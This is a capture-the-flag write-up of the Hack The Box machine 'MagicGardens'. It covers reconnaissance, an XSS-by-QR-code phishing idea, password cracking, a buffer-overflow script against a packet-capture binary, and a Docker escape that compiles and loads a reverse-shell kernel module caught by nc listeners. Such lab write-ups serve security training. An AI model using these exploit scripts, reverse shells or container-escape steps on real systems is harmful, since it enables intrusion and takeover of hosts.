MagicGardens is an insane-difficulty machine from Hack The Box. It deals initially with a phishing attack that will trigger and XSS vulnerability through crafting a malicious QR Code which gives us access to a Django Administrator admin account where we’ll crack a password an land a shell on the Morty user. Later we’ll be reverse engineering a Network Monitoring tool named Harvest in order to trigger a BoF vulnerability and get access to user flag. Finally we’ll be utilizing a cool Docker Escape Technique which will lead us to creating and injecting a custom Kernel module to escape the Docker container and land a root shell.
PS C:\Users\0xkujen> nmap -A-Pn10.129.41.157 Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-2315:43 W. Central Africa Standard Time NSOCK ERROR [0.2650s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for10.129.231.24 Host is up (0.12s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 e072624899334ffc59f86c0559dba77b (ECDSA) |_ 25662c6357e823eb10f9b6f5beafec5859a (ED25519) 25/tcp filtered smtp 80/tcp open http nginx 1.22.1 |_http-title: Did not follow redirect to http://magicgardens.htb/ |_http-server-header: nginx/1.22.1 5000/tcp open ssl/http Docker Registry (API: 2.0) |_http-title: Site doesn't have a title. | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU | Not valid before: 2023-05-23T11:57:43 |_Not valid after: 2024-05-22T11:57:43 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=9/23%OT=22%CT=1%CU=32132%PV=Y%DS=2%DC=T%G=Y%TM=66F17F0 OS:B%P=i686-pc-windows-windows)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A OS:)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54E OS:ST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W OS:5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y% OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE OS:(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 186.00 ms 10.10.16.1 2 70.00 ms 10.129.231.24 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 101.68 seconds
We’ve got a web app running on port 80 that’s redirecting us towards magicgardens.htb (which we’ll add to our /etc/hosts file) and a Docker instance running on port 5000.
So we’ll be making a request where the bank field has the value honestbank.htb, let’s try to change that to our local address and see what sort of requests we’re getting:
Well this is interesting: the server is making a request to the bank we chose honestbank.htb (which we now changed to our own local server) to specifically a /api/payments endpoint. One more thing to add, is that the result of our request is this: Web Application
And after waiting for a few seconds, we get a rejection: Web Application
So I will create a local web server with a /api/payments endpoint and see whats going on:
if __name__ == '__main__': app.run(host='0.0.0.0', port=80, debug=True)
And we got it! Alongside the json data that’s being passed:
1 2 3 4 5 6 7 8 9 10 11 12 13
PS C:\Users\0xkujen> python3 .\server.py * Serving Flask app 'server' * Debug mode: on WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. * Running on all addresses (0.0.0.0) * Running on http://127.0.0.1:80 * Running on http://192.168.1.21:80 Press CTRL+C to quit * Restarting with stat * Debugger is active! * Debugger PIN: 119-575-313 {'cardname': 'kujen', 'cardnumber': '1111-2222-3333-4444', 'expmonth': 'april', 'expyear': '2026', 'cvv': '352', 'amount': 25, 'status': '200'} 10.129.41.157 - - [08/Feb/202508:27:38] "POST /api/payments/ HTTP/1.1"200 -
And now after validating our poyment method, we have become a premium member: Web Application
Now let’s process that QR code and see what it has: QR Code
Seems like some sort of ID for us.
Now what we can do is go ahead and buy something from the store, we get this: Web Application
And after a few seconds I get an email for Morty:
Web Application
This seems like a phishing attacks that’ll lead us to perform an XSS and get Morty’s access. So I’ll be crafting a QR code based off of the previous QR code result: QR Code
* Append -w 3 to the commandline. This can cause your screen to lag.
* Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework
Commands: server run harvest in server mode client run harvest in client mode
Options: -h show this message -l <file> log file -i <interface> capture packets on this interface
Example: harvest server -i eth0 harvest client 10.10.15.212
Please, define mode
morty@magicgardens:~$
I’ll download the binary to my system and have a look at it. Firstly from what I understood, harvest runs as a network packet capture server on the specified network interface and the client connects to harvest server to relay some sort of network data.
First I’ll be taking a look at the handshake that’s happening between the server and the client:
Harvest
At first, the handshake will be compared. If it’s correct, the monitoring will start. However, the handshake starts with harvest v, and there are some numbers or letter after it:
In conclusion, s is a string that gets manipulated and compared with the contents of buf. s1 is essentially a pointer to s, and s2 is a pointer to the buf string. The code is checking if s (through s1) and buf (through s2) are equal using _strcmp.
I’ll fire up gdb alongside gef python extension and see what we got. I’ll first disassemble the server handshake function:
kujen@kujen:~$ gdb ./harvest GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git Copyright (C) 2024 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty"for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration"for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type"help". Type "apropos word" to search for commands related to "word"... GEF for linux ready, type `gef' to start, `gef config' to configure 93 commands loaded and 5 functions added for GDB 15.0.50.20240403-git in 0.00ms using Python engine 3.12 Reading symbols from ./harvest...
gef➤ break *0x555555555c0f Breakpoint 1 at 0x555555555c0f gef➤ break *0x555555555c12 Breakpoint 2 at 0x555555555c12 gef➤ set args server gef➤
Now I’ll listen for incoming traffic and see the result of my comparison: Harvest We can see that its comparing the version to 1.0.3 which is the harvest version we’re alreay working with.
So now I’ll send our harvest v1.0.3 string to the server and see what happens: Harvest And we got a handshake!
Let’s test the BOF now. I will write a small code that establishes a UDP connection to the local IPv6 server (::1 on port 1338) and then send my BOF data to it:
1 2 3 4 5 6 7 8
import socket
server_address = ('::1',1338) s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) s.connect(server_address) data = b'A'*65500 s.send(data)
We can see that a lot of AAAAA written locally, which means that we really have a BOF: Harvest
Now the tricky part is to figure out where the file name will be in the payload, that’s why I’ll use msf-pattern_create because it will give me a unique strings so I’ll be able to determine indexes: msf-pattern_create -l 65500 > bof Harvest
And now we have our filename: Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy
Now if we try to find this string inside our msf-generated payload we’d find 4 occurances because that’s just how msf does it (by repeating trunks of the data):
1 2 3 4 5 6 7
┌──(kali㉿kali)-[~] └─$ msf-pattern_offset -q Fu8F -l 65500 [*] Exact match at offset 4524 [*] Exact match at offset 24804 [*] Exact match at offset 45084 [*] Exact match at offset 65364
We can keep testing and eventually we’ll get that the offset we’re looking for is 65364. So let’s modify our script: Harvest And the filename was successfully written.
Now I’ll have to find-tune the code a bit to ensure that the filename is correctly written. We slightly increased the offset to 65372 to ensure that our filename string fit within the expected memory region. This ensured that the filename was properly terminated and didn’t interfere with surrounding data. The newline (\r) was placed correctly, preventing parsing issues:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(kali㉿kali)-[~] └─$ cat code.py import socket
server_address = ('::1',1338) s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) s.connect(server_address) data='' withopen('bof.txt','rb') as f: data=bytearray(f.read()) new=b"/tmp/kujen.txt\r" #data[65372:len(new)]=new s.send(data[:65372]+new)
And we can see the beginning of what was written into the file:
┌──(kali㉿kali)-[~] └─$ msf-pattern_offset -q Aa4A -l 65500 [*] Exact match at offset 12 [*] Exact match at offset 20292 [*] Exact match at offset 40572 [*] Exact match at offset 60852
I’ll go with the “12” offset. One last step is I’ll inject a random known string to check with this offset:
1 2 3 4 5 6 7 8 9 10 11 12 13
import socket server_address = ('::1',6666) s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) s.connect(server_address)
data = '' withopen('bof.txt', 'rb') as f: data = bytearray(f.read()) new = b"/tmp/kujen.txt" sendData = data[:65372] + new code = "kujenRocks" sendData[12:12+len(code)]=code.encode() s.send(sendData)
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have mail. Last login: Sat Feb 8 05:58:50 2025 from 10.10.16.39 alex@magicgardens:~$ id uid=1000(alex) gid=1000(alex) groups=1000(alex),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth) alex@magicgardens:~$ cat user.txt 915a2510beb449efc4a0945814ba5e73 alex@magicgardens:~$
Privilege Escalation - Docker Escape
One of the first things to check is existing emails:
However we need a password for it, let’s crack it then:
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~] └─# john -w=/usr/share/wordlists/rockyou.txt alex.hash
Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status realmadrid (auth.zip/htpasswd) 1g 0:00:00:00 DONE (2025-02-08 11:59) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger Use the "--show" option to display all of the cracked passwords reliably Session completed.
┌──(root㉿kali)-[~] └─# john -w=/usr/share/wordlists/rockyou.txt htpasswd
Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 32 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status diamonds (AlexMiles) 1g 0:00:00:00 DONE (2025-02-08 12:00) 4.761g/s 4628p/s 4628c/s 4628C/s blonde..87654321 Use the "--show" option to display all of the cracked passwords reliably Session completed.
And we got the password! Taking a look at our network interfaces, we find some for docker. Let’s check process for anything docker-related then:
We’ll simply put the SECRET_KEY inside of the code, get a session cookie that we’ll later inject inside of a request going to the Django instance, and get our root shell.
PS C:\Users\0xkujen> nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.16.39] from (UNKNOWN) [10.129.231.24] 60086 bash: cannot set terminal process group (16): Inappropriate ioctl for device bash: no job control in this shell root@5e5026ac6a81:/usr/src/app# id id uid=0(root) gid=0(root) groups=0(root)
However we are only root on the docker container.
1 2 3 4 5 6 7 8 9
root@5e5026ac6a81:/usr/src# ls ls app linux-headers-6.1.0-11-amd64 linux-headers-6.1.0-11-common linux-headers-6.1.0-20-amd64 linux-headers-6.1.0-20-common linux-kbuild-6.1 root@5e5026ac6a81:/usr/src#
These files (linux-headers-6.1.0-11-amd64 or linux-headers-6.1.0-11-common) should not appear in the folder, because these files are usually used when compiling kernel. (docker will use containered, which will share the same kernel with the host).
Then gcc and make were also installed on our container, which is sus.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
root@5e5026ac6a81:/usr/src# capsh --print
capsh --print Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap=ep Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_audit_write,cap_setfcap Ambient set = Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore Securebits: 00/0x0/1'b0 (no-new-privs=0) secure-noroot: no (unlocked) secure-no-suid-fixup: no (unlocked) secure-keep-caps: no (unlocked) secure-no-ambient-raise: no (unlocked) uid=0(root) euid=0(root) gid=0(root) groups=0(root) Guessed mode: HYBRID (4)
root@5e5026ac6a81:/usr/src# ls ls Makefile Module.symvers app linux-headers-6.1.0-11-amd64 linux-headers-6.1.0-11-common linux-headers-6.1.0-20-amd64 linux-headers-6.1.0-20-common linux-kbuild-6.1 modules.order reverse-shell.c root@5e5026ac6a81:/usr/src# make make make -C /lib/modules/6.1.0-20-amd64/build M=/usr/src modules make[1]: Entering directory '/usr/src/linux-headers-6.1.0-20-amd64' CC [M] /usr/src/reverse-shell.o MODPOST /usr/src/Module.symvers CC [M] /usr/src/reverse-shell.mod.o LD [M] /usr/src/reverse-shell.ko BTF [M] /usr/src/reverse-shell.ko Skipping BTF generation for /usr/src/reverse-shell.ko due to unavailability of vmlinux make[1]: Leaving directory '/usr/src/linux-headers-6.1.0-20-amd64' root@5e5026ac6a81:/usr/src# insmod reverse-shell.ko insmod reverse-shell.ko root@5e5026ac6a81:/usr/src#
And we’re in:
1 2 3 4 5 6 7 8 9 10 11 12
PS C:\Users\0xkujen> nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.16.39] from (UNKNOWN) [10.129.231.24] 41850 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell root@magicgardens:/# id id uid=0(root) gid=0(root) groups=0(root) root@magicgardens:/# cat /root/root.txt cat /root/root.txt c5c9bc85fb66baaa0bfb5072a793cd1d root@magicgardens:/#
